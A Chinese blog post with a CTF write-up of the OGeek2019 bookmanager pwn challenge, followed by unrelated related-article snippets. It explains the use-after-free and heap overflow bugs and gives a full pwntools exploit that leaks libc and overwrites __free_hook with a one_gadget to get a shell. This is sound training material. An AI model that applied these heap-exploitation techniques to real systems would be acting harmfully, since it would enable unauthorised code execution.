heap_overflow(OGeek2019-bookmanger50)

最新推荐文章于 2024-01-12 12:45:45 发布
最新推荐文章于 2024-01-12 12:45:45 发布
阅读量432 收藏
点赞数
分类专栏: pwn题目 文章标签: pwn glibc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/123740709
版权

题目:OGeek2019-bookmanger50

保护

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gy2rHTym-1648199452615)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165315445.png)

分析

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3JSoLvKg-1648199452615)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165412444.png)

add_chapter

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t8pet3Rl-1648199452616)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165433657.png)

add_section

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gH9W4Fjc-1648199452616)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165452794.png)

add_text

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qDGm54uz-1648199452617)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165505763.png)

rm_chapter

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UNBUHGOV-1648199452617)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165516208.png)

rm_section

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-klJ9XTwO-1648199452617)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165525663.png)

rm_text

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RyPG9r1R-1648199452618)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165536035.png)

show

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IjqoQXFC-1648199452618)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165557068.png)

edit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VPUjcfQP-1648199452619)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165609472.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XNsdVjFY-1648199452619)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325165614794.png)

思路

这题的漏洞非常多有uaf,off-by-one,堆溢出因为漏洞太多以至于给我整不会了,ida逆向时看起来挺复杂其实就是一个常规的简单堆题,我在做unsort bin泄漏libc时把堆空间整坏了,做题时我没注意到泄漏方式的问题导致我后面做的怀疑人生,导致花了非常多时间,其实这题非常简单,没有很多常规题的限制

整理出来大概堆空间如下:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-384n83YG-1648199452619)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325170056609.png)

且每个ptr都可以单独申请出来,且漏洞非常多,限制少,就导致这题做法特别灵活.

首先unseat bin泄漏libc

    add('chapter','','0')
    add('section','0','A')
    add('text','A','B',0x90)

    add('section','0','B') #0x40

    dele('section','A') #uaf
    add('text','B','B',0x90) #uaf
    show()
    ru('Text:')
    ru('Text:')
    leak = info(rc(6),'libc') #leak libc
    libc.address =  leak - (0x7ff30239eb42- 0x7ff301fda000) # 0x3c4b78

通过堆溢出即可完成写入one_gadget

edit('Text','B',b'A'*0x98 +p64(0x41)+ p64(0x41)+ p8(0)*0x18+ p64(libc.symbols['__free_hook']))
edit('Text','A',p64(one[1] + libc.address))
dele('chapter','0') #getshell

完整exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#import sys

#context.terminal = ['terminator', '-x', 'sh', '-c']
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
context.arch = 'amd64'
SigreturnFrame(kernel = 'amd64')

binary = "./OGeek2019-bookmanger50"

one = [0x45216,0x4526a,0xf02a4,0xf1147]  #2.23(64)
#idx = int(sys.argv[1])

global p
local = 1
if local:
    p = process(binary)
    e = ELF(binary)
    libc = e.libc
else:
    p = remote("node4.buuoj.cn","29119")
    e = ELF(binary)
    libc = e.libc
    #libc = ELF('./libc_32.so.6')

################################ Condfig ############################################
sd = lambda s:p.send(s)
sl = lambda s:p.sendline(s)
rc = lambda s:p.recv(s)
ru = lambda s:p.recvuntil(s)
sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
it = lambda :p.interactive()

def z(s='b main'):
    gdb.attach(p,s)

def logs(mallocr,string='logs'):
    if(isinstance(mallocr,int)):
       print('\033[1;31;40m%20s-->0x%x\033[0m'%(string,mallocr))
    else:
       print('\033[1;31;40m%20s-->%s\033[0m'%(string,mallocr))

def pa(s=1,t='step'):
    log.success('pause : '+ t +'---> '+str(hex(s)))
    pause()

def info(data,key='info',bit=64):
    if(bit == 64):
      leak = u64(data.ljust(8, b'\0'))
    else:
      leak = u32(data.ljust(4, b'\0'))
    logs(leak,key)
    return leak

################################ Function ############################################
def add(ty,i='',c='',t=0x10):
    if ty=='chapter':
        sla('choice:','1')
        sa('name:',c)
    elif ty=='section':
        sla('choice:','2')
        sa('into:',i)
        sa('name:',c)
    elif ty=='text':
        sla('choice:','3')
        sa('into:',i)
        sa('write:',str(t))
        sa('Text:',c)
def dele(ty,i):
    if ty=='chapter':
        sla('choice:','4')
        sla('name:',str(i))
    elif ty=='section':
        sla('choice:','5')
        sla('name:',str(i))
    elif ty=='text':
        sla('choice:','6')
        sla('name:',str(i))

def show():
    sla('choice:','7')
def edit(tr,s,n):
    sla('choice:','8')
    sla(':',tr)
    sa('name:',s)
    sa(':',n)
################################### Statr ############################################
def pwn():
    sla('create:','root') #这里没啥用

    add('chapter','','0')
    add('section','0','A')
    add('text','A','B',0x90)

    add('section','0','B') #0x40

    dele('section','A') #uaf
    add('text','B','B',0x90) #uaf
    show()
    ru('Text:')
    ru('Text:')
    leak = info(rc(6),'libc') #leak libc
    libc.address =  leak - (0x7ff30239eb42- 0x7ff301fda000) # 0x3c4b78

    edit('Text','B',b'A'*0x98 +p64(0x41)+ p64(0x41)+ p8(0)*0x18+ p64(libc.symbols['__free_hook']))
    edit('Text','A',p64(one[1] + libc.address))
    dele('chapter','0')
    p.interactive()
################################### End ##############################################
pwn()
while 0:
    try:
        pwn()
        break
    except (KeyboardInterrupt [KeyboardInterrupt ]):
        p.close()
        #p = process(binary)
        p = remote("node4.buuoj.cn","29728")

远程

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OxR1R3cf-1648199452620)(heap_overflow(OGeek2019-bookmanger50)].assets/image-20220325170658579.png)

HNHuangJingYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[OGeek2019]bookmanager
z1r0的博客
04-02 345
[OGeek2019]bookmanager 查看保护 这题的功能多,要审计的代码多,但是漏洞也多,这里笔者就例出笔者getshell所使用的漏洞 可以看到这里在update text的时候可以改0xff大小, 笔者用的最多的就是这里的漏洞。 攻击思路: 1.因为可以改0xff大小所以我们可以借助这个来使得0x91全部填满,在填满之前让下面的0x91释放掉。这样一来垃圾数据就可以直接连接到被释放掉的0x91的fd这里,show一下即可拿到libc。 2.拿到libc之后笔者再次利用了这个漏洞先将下面的
关于Heap Overflow(堆溢出)
krrrr的专栏
05-04 9322
Heap overflow是一种系统提升权限的方法。在Linux系统中,入侵者可以针对某些文件属性设置成+rws(也就是传说中的粘滞位)的漏洞程序进行攻击从而得到root权限。我们在模拟攻击时可以在root权限下使用以下命令来设置粘滞位属性:                             chown root:root xxx                         
Heap overflow堆溢出(一)
「鸿渐之翼」的博客
10-01 3363
堆溢出介绍: 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址......
溢出科普:heap overflow&溢出保护和绕过
weixin_34320724的博客
03-08 1780
pr0mise · 2016/04/11 9:500x00 第一部分:heap overflow接上文,来看另外一种溢出方式:堆溢出.相对于栈溢出来说,稍微麻烦一点本文算是一个笔记,技术有限,难免有纰漏之处,欢迎诸君斧正.0x01 基础知识一.堆的结构堆为程序运行时主动申请的内存,通常称为堆区,操作堆的api从UserMode来看有:例如malloc申请一块内存会先调用HeapCreate()为自...
BUUCTF pwn 四月刷题
coco的博客
04-07 859
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory
CreeSteve的博客
04-15 6980
这个错误的意思是 JavaScript 堆内存不足。这意味着你的程序尝试使用更多内存,但是电脑上可用的内存不足以满足需求。这种情况通常发生在你的程序中存在内存泄露(memory leak)或者你的程序使用了过多的内存。
mysql max_heap_table_size,更改MySQL中的max_heap_table_size值?
weixin_36080842的博客
03-17 6369
max_heap_table_size是同时具有读/写属性的系统变量。最初,max_heap_table_size的大小为16 MB。首先,检查max_heap_table_size的值(以字节为单位)。查询如下-mysql>select@@max_heap_table_size;以下是输出-+-----------------------+|@@max_heap_table_size...
FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 解决方法
iuvc的博客
01-29 5085
随着前端项目代码越来越臃肿,项目编译运行,热更新启动的时候,时常会出现 `FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory` 这样的报错。
Leetcode 报错: heap-buffer-overflow on address
m0_59524132的博客
01-12 686
原因是发生了数组越界,访问了不存在的下标,修改代码(把dp[1]的初始化放在循环里执行)之后报错消失。
mozilla_nntp_heap_overflow.nasl
11-08
mozilla_nntp_heap_overflow
mysql tmp_table_size和max_heap_table_size大小配置
01-19
(实际起限制作用的是tmp_table_size和max_heap_table_size的最小值。)如果内存临时表超出了限制,MySQL就会自动地把它转化为基于磁盘的MyISAM表,存储在指定的tmpdir目录下,默认: mysql> show variables like ...
api-ms-win-core-heap-l2-1-0.dll (64位)
08-14
《API-MS-WIN-CORE-HEAP-L2-1-0.DLL:64位Windows 10系统的关键组件》 在计算机操作系统中,动态链接库(DLL)是实现功能模块化的重要部分,它们允许多个程序共享同一段代码和数据,节省内存并提高效率。"api-ms-...
vue项目编译时报错:FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory
Debug的博客
06-28 1129
全局安装 第二步: 打开终端,执行:
2024-2030全球与中国硅胶婴儿用品市场现状及未来发展趋势 Sample-Li Jinpan.pdf
09-05
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
09-05
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
Flow-Guided-Feature-Aggregation研究基于视频的目标检测FGFA框架.zip
最新发布
09-05
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
习题集计算机原理习题集
09-05
【习题集】计算机原理习题集 计算机原理习题集 习题 一 1.微型计算机的发展经历了哪几个时代?每个时代有哪些主要特点? 2.简述Pentium4 微处理器的处理能力。 3.冯·诺依曼计算机的结构特点是什么? 4.典型微机有哪三大总线?它们传送的是什么信息? 5.什么叫微处理器?什么叫微型计算机?什么叫微型计算机系统?这三者有什么区别和联系? 6.微处理器内部一般由哪些部分组成?各部分的主要功能是什么? 7.试用示意图说明内存单元的地址和内存单元的内容,二者有何联系和区别? 8.高级语言、汇编语言、机器语言有何区别?各有何特点? 9.评价微型计算机性能的主要指标有哪些?试举例说明现在市场主流机型微型计算机的性能参数。 10.现代微型计算机的主板通常由哪些部分组成?主板上的总线扩展插槽有何用途? 习题 二 1.8086CPU从功能上分为哪两个工作部件?每个工作部件的功能、组成和特点分别是什么? 2.8086CPU中有几个通用寄存器,有几个变址寄存器,有几个地址指针寄存器?它们中通常哪几个寄存器可作为地址寄存器使用? 3.8086CPU的标志寄存器中有哪些标志位?它们的含义和作用是什么?
基于Spring Boot框架的尚融宝网络借贷平台.zip
09-05
基于Spring Boot框架的尚融宝网络借贷平台 项目介绍 尚融宝是一个网络借贷信息中介服务平台,致力为高成长人群提供专业的线上信贷及出借撮合服务。行业案例包括人人贷、拍拍贷等。 技术架构 前端 Node.js: Js运行环境 ES6: Js模块化版本 Axios: Ajax请求工具 Vue.js: 前端框架 ElementUI: 前端组件库 Vueelementadmin: 后台管理系统UI集成方案 NuxtJS: 前端服务器 后端 SpringBoot: 微服务开发框架 SpringCloud: 微服务组件库 SpringCloud Alibaba: 阿里微服务组件库 MyBatis Plus: 持久层框架 Swagger2: API接口文档生成工具 LogBack: 日志系统 alibabaeasyExcel: Excel读写框架 Redis: 缓存中间件 MySQL: 关系型数据库 SpringTask: 定时任务 RabbitMQ: 消息中间件 项目结构 前端 srbadmin: 管理平台 srbsi
基于改进YOLOv5检测脑瘤
09-05
mdpi的一篇文章,文章内容是关于结合NLNN和YOLOv5对脑肿瘤进行检测(是检测不是分类也不是分割)的一篇文章,文章里面说清楚了数据集的来源以及如何处理的,可以大致看一看,了解下相关背景以及如何用YOLO检测脑瘤的文章的写法,另外NLNN这个点也有些创意,有点像简化版自注意力机制,可以找找相关代码看看
jcmd <PID> GC.heap_dump <file-path>
05-25
其中,jcmd <PID> GC.heap_dump <file-path> 命令可以用来生成Java进程的堆转储文件。具体来说,<PID> 是Java进程的ID,<file-path> 是生成的堆转储文件的保存路径。执行该命令后,Java进程会将当前的堆转储到指定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值